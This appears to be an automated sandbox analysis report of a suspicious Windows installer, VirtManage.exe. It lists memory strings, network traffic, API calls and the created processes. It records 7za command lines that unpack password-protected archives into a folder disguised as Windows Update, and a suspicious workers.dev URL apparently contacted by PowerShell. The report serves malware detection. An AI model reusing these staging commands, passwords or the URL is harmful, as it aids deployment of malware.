Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 0000001B.00000002.3414690740.0000021BCCC20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
Source: svchost.exe, 00000020.00000002.2851500549.0000021ACEA00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000020.00000003.1203114481.0000021ACE8B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18965000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: VirtManage.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000001B.00000002.3402117398.0000021BC47E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E17F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001B.00000002.3414690740.0000021BCCC20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911793607.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000003.00000002.917102011.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000005.00000002.922912388.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 0000000A.00000002.978937758.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000011.00000002.1006362463.00000000630A7000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E17F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1249222551.0000016E302D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E193D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E19F1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E19EF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E193D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.org
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.orgGnuPGgpggpgsmgpg-agentgpgtarEMAILGNUPGGPGGPGSMGPG_AGENTSCDAEMONTPM2DAEMONDIRMN
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB50AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev
Source: 7za.exe, 00000013.00000003.1009751136.000001AC45C50000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402117398.0000021BC4771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3414029874.0000021BCC9B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4E5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402117398.0000021BC4A6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB4C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402117398.0000021BC47E3000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1269985096.000001F1C7B42000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275327848.000001F1C7AAD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274470395.000001F1C933B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1275000997.000001F1C7AAB000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274936275.000001F1C7AA3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1269856750.000001F1C7B54000.00000004.00000020.00020000.00000000.sdmp, b0okydtw.dll.33.dr, kautix2aeX.t.19.dr | String found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev/
Source: powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000020.00000003.1203114481.0000021ACE8E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000020.00000003.1203114481.0000021ACE8B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18122000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: libgpg-error-0.dll.0.dr | String found in binary or memory: https://gnu.org/licenses/
Source: libgpg-error-0.dll.0.dr | String found in binary or memory: https://gnu.org/licenses/gpl.html
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.html
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.htmlWARNING:
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: https://gnupg.org0/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB601B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E18965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E193D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000001B.00000002.3402117398.0000021BC47E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.robware.net/about
Source: unknown | HTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49759 version: TLS 1.2
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\VirtManage.exe | Process token adjusted: Security
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: String function: 004DF490 appears 40 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: String function: 00434B30 appears 34 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: String function: 00426BB0 appears 44 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: String function: 004DEFB0 appears 82 times
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: String function: 665896E6 appears 71 times
Source: zlib1.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libgcrypt-20.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libnpth-0.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libgpg-error-0.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: aclui-2.dll.19.dr | Static PE information: Number of sections : 20 > 10
Source: libassuan-9.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: aclui.dll.19.dr | Static PE information: Number of sections : 20 > 10
Source: aclui.dll.0.dr | Static PE information: Number of sections : 20 > 10
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000002.3333068485.000000000040A000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamensis7z.dll, vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegpg-agent.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegpg.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibassuan.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibgcrypt.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibgpg-error.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibnpth.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: classification engine | Classification label: mal42.expl.evad.winEXE@54/56@2/3
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_004AE4A0 FormatMessageA,strlen,GetLastError
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00404B74 GetDiskFreeSpaceW,MulDiv
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00402200 FreeLibrary,CoCreateInstance
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | File created: C:\Users\user\AppData\Roaming\gnupg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\Users\user\AppData\Local\Temp\nsg6D2.tmp
Source: VirtManage.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\VirtManage.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\VirtManage.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table if not exists encryptions (binding INTEGER NOT NULL, time INTEGER);create index if not exists encryptions_binding on encryptions (binding);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table version (version INTEGER);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: insert into version values (1);
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select count(*) from sqlite_master where type='table';
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select ((select count(*) from ultimately_trusted_keys where (keyid in (%s))) == %d) and ((select count(*) from ultimately_trusted_keys where keyid not in (%s)) == 0);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select user_id, policy from bindings where fingerprint = ?;
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select fingerprint || case sum(conflict NOTNULL) when 0 then '' else '!' end from bindings where email = ? group by fingerprint order by fingerprint = ? asc, fingerprint desc;
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: insert into ultimately_trusted_keys values ('%s');
